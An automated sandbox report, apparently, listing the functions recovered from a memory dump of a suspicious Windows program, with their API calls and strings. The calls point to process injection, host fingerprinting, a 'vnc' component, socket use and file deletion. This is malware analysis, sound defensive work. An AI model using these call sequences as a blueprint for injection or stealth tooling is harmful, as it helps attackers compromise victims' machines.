Part of subcall function 00CD6240: GetLastError.KERNEL32(?,?,?,?), ref: 00CD62E1
Part of subcall function 00CD6240: CloseHandle.KERNEL32 ref: 00CD62EF
Part of subcall function 00CD6240: memcpy.MSVCRT ref: 00CD6319
Part of subcall function 00CD6240: memcpy.MSVCRT ref: 00CD632D

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

WaitForSingleObject.KERNEL32(00007530), ref: 00CD6504

Part of subcall function 00CD2FB7: ReleaseMutex.KERNEL32 ref: 00CD2FBB
Part of subcall function 00CD2FB7: CloseHandle.KERNEL32 ref: 00CD2FC2

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CDDEBB, Relevance: 10.6, APIs: 3, Strings: 2, Instructions: 27

APIs

GetModuleHandleW.KERNEL32(shell32.dll), ref: 00CDDEC9
GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00CDDED5
SetLastError.KERNEL32(00000001,00CE42C8,00D02954,?,00D02DB4,00000000,00000006,?,00CEBBC2,00D02DB4,?,?,00000000), ref: 00CDDEED

Strings

shell32.dll, xrefs: 00CDDEC8
SHGetKnownFolderPath, xrefs: 00CDDED3

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD79B9, Relevance: 10.6, APIs: 7, Instructions: 126

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00CD79F0
WSASetLastError.WS2_32(00000008), ref: 00CD79FF
memcpy.MSVCRT ref: 00CD7A1C
memcpy.MSVCRT ref: 00CD7A2E
WSASetLastError.WS2_32(00000008,?,?,?), ref: 00CD7A98
WSAGetLastError.WS2_32(?,?,?), ref: 00CD7AB4

Part of subcall function 00CD7CDE: InterlockedIncrement.KERNEL32(?,?,00000000), ref: 00CD7D2F
Part of subcall function 00CD7CDE: RegisterWaitForSingleObject.KERNEL32(?,?,00CD7B1D,?,000000FF,00000004), ref: 00CD7D43

WSASetLastError.WS2_32(00000008,?,?,?,?,?,?,?), ref: 00CD7ADD

Part of subcall function 00CCF9C5: memcpy.MSVCRT ref: 00CCF9DA
Part of subcall function 00CCF9C5: SetEvent.KERNEL32 ref: 00CCF9EA

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD5208, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60

APIs

memset.MSVCRT ref: 00CD5229
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,?,?,?), ref: 00CD5261
memcpy.MSVCRT ref: 00CD527C
CloseHandle.KERNEL32(?), ref: 00CD5291
CloseHandle.KERNEL32(?), ref: 00CD5297

Strings

D, xrefs: 00CD5232

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD9895, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49

APIs

CloseHandle.KERNEL32 ref: 00CD989F
GetSystemTimeAsFileTime.KERNEL32(?), ref: 00CD98AD

Part of subcall function 00CCE6AF: GetFileAttributesW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data), ref: 00CCE6BC
Part of subcall function 00CCE6AF: CreateFileW.KERNEL32(C:\Documents and Settings\Administrator\Local Settings\Application Data,80000000,00000007,00000000,00000003,?,00000000), ref: 00CCE6DC

memcpy.MSVCRT ref: 00CD98E8
lstrcpyW.KERNEL32(?,?), ref: 00CD98FD

Part of subcall function 00CEB9D8: PathIsDirectoryW.SHLWAPI(?), ref: 00CEBA0E
Part of subcall function 00CEB9D8: CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000003,02000000,00000000), ref: 00CEBA30
Part of subcall function 00CEB9D8: GetFileTime.KERNEL32(?,?,00000000,00000000), ref: 00CEBA76
Part of subcall function 00CEB9D8: CloseHandle.KERNEL32 ref: 00CEBA95
Part of subcall function 00CEB9D8: PathRemoveFileSpecW.SHLWAPI ref: 00CEBAA2

CloseHandle.KERNEL32 ref: 00CD9916

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00CD98B3

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCA5B2, Relevance: 10.5, APIs: 4, Strings: 1, Instructions: 293

APIs

Part of subcall function 00CEBEE3: CreateMutexW.KERNEL32(00D02974,00000000,?), ref: 00CEBF05

Part of subcall function 00CC9F72: memcpy.MSVCRT ref: 00CC9F80

Part of subcall function 00CD1B16: CreateFileW.KERNEL32(00F51EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CD1B2F
Part of subcall function 00CD1B16: GetFileSizeEx.KERNEL32(?,?), ref: 00CD1B42
Part of subcall function 00CD1B16: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00CD1B68
Part of subcall function 00CD1B16: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00CD1B80
Part of subcall function 00CD1B16: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CD1B9E
Part of subcall function 00CD1B16: CloseHandle.KERNEL32 ref: 00CD1BA7

memset.MSVCRT ref: 00CCA757
memcpy.MSVCRT ref: 00CCA780

Part of subcall function 00CED95F: GetSystemTime.KERNEL32(?), ref: 00CED969

Part of subcall function 00CD69C9: HeapAlloc.KERNEL32(00000000,?,?,00CF4E9D,00CC9851,?,?,00CF4FB1,?,?,?,?,?,?,?,?), ref: 00CD69F3
Part of subcall function 00CD69C9: HeapReAlloc.KERNEL32(00000000,?,?,?,00CF4E9D,00CC9851,?,?,00CF4FB1,?,?,?,?,?,?), ref: 00CD6A06

Part of subcall function 00CF3993: memcpy.MSVCRT ref: 00CF3AA4

CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00CCA885
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CCA8A1

Part of subcall function 00CCE348: CloseHandle.KERNEL32 ref: 00CCE354

Part of subcall function 00CD2FB7: ReleaseMutex.KERNEL32 ref: 00CD2FBB
Part of subcall function 00CD2FB7: CloseHandle.KERNEL32 ref: 00CD2FC2

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CCA46D: memset.MSVCRT ref: 00CCA47C
Part of subcall function 00CCA46D: memset.MSVCRT ref: 00CCA4BF
Part of subcall function 00CCA46D: memset.MSVCRT ref: 00CCA4F5

Part of subcall function 00CD1149: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CD1158

Part of subcall function 00CD0C35: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00CD0C9B
Part of subcall function 00CD0C35: memcpy.MSVCRT ref: 00CD0CB5
Part of subcall function 00CD0C35: VirtualProtect.KERNEL32(?,?,00000002,-00000048), ref: 00CD0CC8
Part of subcall function 00CD0C35: memset.MSVCRT ref: 00CD0D1F
Part of subcall function 00CD0C35: memcpy.MSVCRT ref: 00CD0D33
Part of subcall function 00CD0C35: VirtualProtect.KERNEL32(?,?,?,-00000048), ref: 00CD0E22

Part of subcall function 00CF3B9E: memcmp.MSVCRT ref: 00CF3C47

Part of subcall function 00CD1BB5: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CD1BC6
Part of subcall function 00CD1BB5: CloseHandle.KERNEL32 ref: 00CD1BD5

Strings

vnc, xrefs: 00CCA601 00CCA60E

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF5419, Relevance: 10.2, APIs: 3, Strings: 2, Instructions: 46

APIs

LoadLibraryW.KERNEL32(urlmon.dll), ref: 00CF5420
GetProcAddress.KERNEL32(?,ObtainUserAgentString), ref: 00CF5436
FreeLibrary.KERNEL32 ref: 00CF5481

Part of subcall function 00CD69B0: HeapAlloc.KERNEL32(00000008,?,?,00CD519B,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD69C1

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Strings

urlmon.dll, xrefs: 00CF541B
ObtainUserAgentString, xrefs: 00CF542E

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CDDEFC, Relevance: 10.2, APIs: 3, Strings: 2, Instructions: 40

APIs

EnterCriticalSection.KERNEL32(00D03510,?,00000000,?,00CE4659,?,00CE49A5,?,?,00000001), ref: 00CDDF10
LeaveCriticalSection.KERNEL32(00D03510,?,00000000,?,00CE4659,?,00CE49A5,?,?,00000001), ref: 00CDDF38

Part of subcall function 00CDDEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 00CDDEC9
Part of subcall function 00CDDEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00CDDED5
Part of subcall function 00CDDEBB: SetLastError.KERNEL32(00000001,00CE42C8,00D02954,?,00D02DB4,00000000,00000006,?,00CEBBC2,00D02DB4,?,?,00000000), ref: 00CDDEED

IsWow64Process.KERNEL32(000000FF,?), ref: 00CDDF61

Strings

IsWow64Process, xrefs: 00CDDF44
kernel32.dll, xrefs: 00CDDF49

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD6997, Relevance: 9.6, APIs: 1, Instructions: 9

APIs

Part of subcall function 00CD692C: EnterCriticalSection.KERNEL32(00D03510,00000024,00CD699F,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD693C
Part of subcall function 00CD692C: LeaveCriticalSection.KERNEL32(00D03510,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD6966

HeapAlloc.KERNEL32(00000000,00000024,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD69A8

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE3C8C, Relevance: 9.6, APIs: 5, Instructions: 138

APIs

Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE439E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI ref: 00CE43A8
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE43F1
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE441E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4428

FindFirstFileW.KERNEL32(?,?), ref: 00CE3CCB
SetLastError.KERNEL32(?,?,?,?), ref: 00CE3DF6

Part of subcall function 00CE3E6B: PathMatchSpecW.SHLWAPI(00000010), ref: 00CE3E98
Part of subcall function 00CE3E6B: PathMatchSpecW.SHLWAPI(00000010), ref: 00CE3EB7

FindNextFileW.KERNEL32(?,?), ref: 00CE3DC0
GetLastError.KERNEL32(?,?), ref: 00CE3DD9
FindClose.KERNEL32 ref: 00CE3DEF

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCDE64, Relevance: 9.5, APIs: 6, Instructions: 88

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,00CCE138,?,?,?,?,?,00000009,00000000), ref: 00CCDE7E
LeaveCriticalSection.KERNEL32 ref: 00CCDF65

Part of subcall function 00CD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD69A8

memcpy.MSVCRT ref: 00CCDEEF
memcpy.MSVCRT ref: 00CCDF13
memcpy.MSVCRT ref: 00CCDF2A
memcpy.MSVCRT ref: 00CCDF4A

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF30A2, Relevance: 9.5, APIs: 5, Instructions: 71

APIs

Part of subcall function 00CF2755: EnterCriticalSection.KERNEL32(00D03510,?,00CF30AF,?,?,00000000), ref: 00CF2765
Part of subcall function 00CF2755: LeaveCriticalSection.KERNEL32(00D03510,?,00000000), ref: 00CF278F

socket.WS2_32(?,00000002,00000000), ref: 00CF30BC
WSAIoctl.WS2_32(?,48000016,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00CF30EF
WSAGetLastError.WS2_32(?,48000016,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00000002,00000000,?,?,00000000), ref: 00CF30F6

Part of subcall function 00CD69B0: HeapAlloc.KERNEL32(00000008,?,?,00CD519B,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD69C1

WSAIoctl.WS2_32(?,48000016,00000000,00000000,?,?,?,00000000,00000000), ref: 00CF312A

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

closesocket.WS2_32 ref: 00CF313A

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE44FB, Relevance: 9.5, APIs: 5, Instructions: 59

APIs

Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE439E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI ref: 00CE43A8
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE43F1
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE441E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4428

FindFirstFileW.KERNEL32(?,?), ref: 00CE452C

Part of subcall function 00CCE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00CCE82F
Part of subcall function 00CCE826: DeleteFileW.KERNEL32(?), ref: 00CCE836

FindNextFileW.KERNEL32(?,?), ref: 00CE457E
FindClose.KERNEL32 ref: 00CE4589
SetFileAttributesW.KERNEL32(?,00000080), ref: 00CE4595
RemoveDirectoryW.KERNEL32(?), ref: 00CE459C

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE4A6B, Relevance: 9.4, APIs: 5, Instructions: 109

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00CE4A89

Part of subcall function 00CE4159: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00CE4188
Part of subcall function 00CE4159: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00CE41C7
Part of subcall function 00CE4159: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00CE41EE

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00CE4AC4
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00CE4B04
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00CE4B27

Part of subcall function 00CE45AE: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00CE45D1
Part of subcall function 00CE45AE: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00CE45E9
Part of subcall function 00CE45AE: DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000001), ref: 00CE4604

VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00CE4B77

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CEB70A, Relevance: 9.4, APIs: 5, Instructions: 89

APIs

Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE439E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI ref: 00CE43A8
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE43F1
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE441E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4428

CreateDirectoryW.KERNEL32(?,00000000), ref: 00CEB783
SetFileAttributesW.KERNEL32(?), ref: 00CEB7A2
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,?,00000000), ref: 00CEB7B9
GetLastError.KERNEL32(?,00000002,?,?), ref: 00CEB7C6
CloseHandle.KERNEL32 ref: 00CEB7FF

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD5C67, Relevance: 9.1, APIs: 5, Instructions: 49

APIs

EnterCriticalSection.KERNEL32(00F51F44,?,?,00000001,00CE4EA8,?,?,00000001), ref: 00CD5C70
LeaveCriticalSection.KERNEL32(00F51F44,?,00000001,00CE4EA8,?,?,00000001), ref: 00CD5C7A
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00CD5CA0
EnterCriticalSection.KERNEL32(00F51F44,?,00000001,00CE4EA8,?,?,00000001), ref: 00CD5CB8
LeaveCriticalSection.KERNEL32(00F51F44,?,00000001,00CE4EA8,?,?,00000001), ref: 00CD5CC2

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD49D7, Relevance: 9.1, APIs: 6, Instructions: 145

APIs

memset.MSVCRT ref: 00CD4A18

Part of subcall function 00CF3D5A: memcpy.MSVCRT ref: 00CF3D94

CharLowerW.USER32 ref: 00CD4A5C
CharUpperW.USER32(?,?,00000001), ref: 00CD4A6D
CharLowerW.USER32 ref: 00CD4A81
CharUpperW.USER32(?,00000001), ref: 00CD4A8B
memcmp.MSVCRT ref: 00CD4AA0

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD7B1D, Relevance: 9.1, APIs: 6, Instructions: 141

APIs

Part of subcall function 00CD568C: TlsSetValue.KERNEL32(00000001,00CD638A), ref: 00CD5699

Part of subcall function 00CCF99C: ResetEvent.KERNEL32 ref: 00CCF9B8

WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00CD7B63
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 00CD7B6D
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 00CD7C76
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 00CD7C7F
UnregisterWait.KERNEL32(?), ref: 00CD7CA4
TlsSetValue.KERNEL32(00000000), ref: 00CD7CCF

Part of subcall function 00CCF9C5: memcpy.MSVCRT ref: 00CCF9DA
Part of subcall function 00CCF9C5: SetEvent.KERNEL32 ref: 00CCF9EA

Part of subcall function 00CCF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00CCF82D

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CEBC3E, Relevance: 9.1, APIs: 5, Instructions: 172

APIs

memset.MSVCRT ref: 00CEBC73
GetComputerNameW.KERNEL32(?,?), ref: 00CEBCA7
GetVersionExW.KERNEL32(?), ref: 00CEBCD0
memset.MSVCRT ref: 00CEBCEF

Part of subcall function 00CE0D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 00CE0D60

Part of subcall function 00CE0D19: RegFlushKey.ADVAPI32 ref: 00CE0D29
Part of subcall function 00CE0D19: RegCloseKey.ADVAPI32 ref: 00CE0D31

Part of subcall function 00CC9A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00CC9ACA
Part of subcall function 00CC9A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00CC9AEF

memset.MSVCRT ref: 00CEBDF4

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CC9A2A: CryptDestroyHash.ADVAPI32 ref: 00CC9A42
Part of subcall function 00CC9A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00CC9A53

Part of subcall function 00CC9B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00CC9B41

Part of subcall function 00CE0FD5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00CEBD4B,?), ref: 00CE0FF2

Part of subcall function 00CE0E64: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CE0EBF

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CDD694, Relevance: 9.1, APIs: 6, Instructions: 79

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000004,00CDD7B9,00000000,?,?,?,?,?,?,00CDC499,?,00000000), ref: 00CDD69E
HeapCreate.KERNEL32(00040001,00000000,00000000), ref: 00CDD6DB
HeapAlloc.KERNEL32(?,00000000,0000000B,?,?,?,?,00000004,00CDD7B9,00000000), ref: 00CDD6F8
HeapFree.KERNEL32(?,00000000,?,?,00000000,0000000B,?,?,?,?,00000004,00CDD7B9,00000000), ref: 00CDD720
memcpy.MSVCRT ref: 00CDD730

Part of subcall function 00CD599B: EnterCriticalSection.KERNEL32(00D027DC,00000000,00CCD9CE,00F51E90,?,?,?,00CD1992,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CD59A7
Part of subcall function 00CD599B: LeaveCriticalSection.KERNEL32(00D027DC,?,?,?,00CD1992,?,?,?,?,00CE48EB,?,?,00000000), ref: 00CD59B7

Part of subcall function 00CD09C2: GetCurrentThreadId.KERNEL32 ref: 00CD09D3
Part of subcall function 00CD09C2: memcpy.MSVCRT ref: 00CD0B42
Part of subcall function 00CD09C2: memset.MSVCRT ref: 00CD0BA8
Part of subcall function 00CD09C2: VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00CD0BBD
Part of subcall function 00CD09C2: GetLastError.KERNEL32(?,00000040,?,?,?,00000000), ref: 00CD0BC7

Part of subcall function 00CD59C5: LeaveCriticalSection.KERNEL32(00D027DC,00CD5A45,00000002,?,?,?,00CCDAA2,00000002,00000001,000000FF), ref: 00CD59CF

Part of subcall function 00CD59D6: LeaveCriticalSection.KERNEL32(00D027DC,?,00CCD9F7,00000009,00F51E90,?,?,?,00CD1992,?,?,?,?,00CE48EB), ref: 00CD59E3

LeaveCriticalSection.KERNEL32(?,?,00000000,0000000B,?,?,?,?,00000004,00CDD7B9,00000000), ref: 00CDD774

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF5BA7, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 72

APIs

lstrcmpA.KERNEL32(?,?\C), ref: 00CF5BC4
lstrcpyW.KERNEL32(00CF597D), ref: 00CF5BD6
lstrcmpA.KERNEL32(?,00CC939C), ref: 00CF5BE9
StrCmpNA.SHLWAPI(?,00CC9394,00000002), ref: 00CF5BFF
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 00CF5C2A

Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE439E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI ref: 00CE43A8
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE43F1
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE441E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4428

Strings

?\C, xrefs: 00CF5BBC

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCC41C, Relevance: 9.1, APIs: 5, Instructions: 137

APIs

EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00CCC44D

Part of subcall function 00CED0A9: WaitForSingleObject.KERNEL32(?,00000000), ref: 00CED0B5

WSAGetLastError.WS2_32(?,?,?,?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00CCC4DF

Part of subcall function 00CCBFFE: getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 00CCC08A
Part of subcall function 00CCBFFE: GetHandleInformation.KERNEL32(?,?), ref: 00CCC09C
Part of subcall function 00CCBFFE: socket.WS2_32(?,00000001,00000006), ref: 00CCC0CF
Part of subcall function 00CCBFFE: socket.WS2_32(?,00000002,00000011), ref: 00CCC0E0
Part of subcall function 00CCBFFE: closesocket.WS2_32(00000002), ref: 00CCC0FF
Part of subcall function 00CCBFFE: closesocket.WS2_32 ref: 00CCC106
Part of subcall function 00CCBFFE: memset.MSVCRT ref: 00CCC1C8
Part of subcall function 00CCBFFE: memcpy.MSVCRT ref: 00CCC3C8

SetEvent.KERNEL32 ref: 00CCC532
SetEvent.KERNEL32 ref: 00CCC56B

Part of subcall function 00CED090: SetEvent.KERNEL32 ref: 00CED0A0

Part of subcall function 00CCF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00CCF82D

LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00CCC5F0

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE53C3, Relevance: 9.1, APIs: 6, Instructions: 61

APIs

Part of subcall function 00CE48F2: GetModuleHandleW.KERNEL32 ref: 00CE4932
Part of subcall function 00CE48F2: WSAStartup.WS2_32(00000202,?), ref: 00CE4998
Part of subcall function 00CE48F2: CreateEventW.KERNEL32(00D02974,00000001), ref: 00CE49BA
Part of subcall function 00CE48F2: GetLengthSid.ADVAPI32(?,?,?,00000001), ref: 00CE49EC
Part of subcall function 00CE48F2: GetCurrentProcessId.KERNEL32 ref: 00CE4A17

SetErrorMode.KERNEL32(00008007), ref: 00CE53DC
GetCommandLineW.KERNEL32 ref: 00CE53E8
CommandLineToArgvW.SHELL32 ref: 00CE53EF
LocalFree.KERNEL32 ref: 00CE542C
ExitProcess.KERNEL32(00000001), ref: 00CE543D

Part of subcall function 00CE5087: CreateMutexW.KERNEL32(00D02974,00000001,?), ref: 00CE512D
Part of subcall function 00CE5087: GetLastError.KERNEL32(?,?,00000001,?,?,?,00CE5452), ref: 00CE513D
Part of subcall function 00CE5087: CloseHandle.KERNEL32 ref: 00CE514B
Part of subcall function 00CE5087: lstrlenW.KERNEL32(?), ref: 00CE51AD
Part of subcall function 00CE5087: ExitWindowsEx.USER32(00000014,80000000), ref: 00CE51DD
Part of subcall function 00CE5087: OpenEventW.KERNEL32(00000002,00000000,?), ref: 00CE5203
Part of subcall function 00CE5087: SetEvent.KERNEL32 ref: 00CE5210
Part of subcall function 00CE5087: CloseHandle.KERNEL32 ref: 00CE5217
Part of subcall function 00CE5087: CloseHandle.KERNEL32 ref: 00CE5229
Part of subcall function 00CE5087: IsWellKnownSid.ADVAPI32(00F51EC0,00000016), ref: 00CE5279
Part of subcall function 00CE5087: CreateEventW.KERNEL32(00D02974,00000001,00000000,?), ref: 00CE5348
Part of subcall function 00CE5087: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CE5361
Part of subcall function 00CE5087: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00CE5373
Part of subcall function 00CE5087: CloseHandle.KERNEL32(00000000), ref: 00CE538A
Part of subcall function 00CE5087: CloseHandle.KERNEL32(?), ref: 00CE5390
Part of subcall function 00CE5087: CloseHandle.KERNEL32(?), ref: 00CE5396

Sleep.KERNEL32(000000FF), ref: 00CE5463

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE027E, Relevance: 9.0, APIs: 5, Instructions: 119

APIs

#8.OLEAUT32(?,?,00CC1618,?,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00CE0301

Part of subcall function 00CD1BDD: #6.OLEAUT32 ref: 00CD1BE7
Part of subcall function 00CD1BDD: #2.OLEAUT32(ProhibitDTD), ref: 00CD1BF5

#6.OLEAUT32(00000000,?,00CC1618,?,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00CE0350
#8.OLEAUT32(?), ref: 00CE035B
#2.OLEAUT32(?), ref: 00CE036D
#9.OLEAUT32(?), ref: 00CE03A4

Part of subcall function 00CF07B1: CoCreateInstance.OLE32(00CC17F8,00000000,00004401,00CC1858,?), ref: 00CF07C6

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD9925, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 71

APIs

memcpy.MSVCRT ref: 00CD993C

Part of subcall function 00CC9F72: memcpy.MSVCRT ref: 00CC9F80

memcmp.MSVCRT ref: 00CD995E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CD998C

Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE439E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI ref: 00CE43A8
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE43F1
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE441E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4428

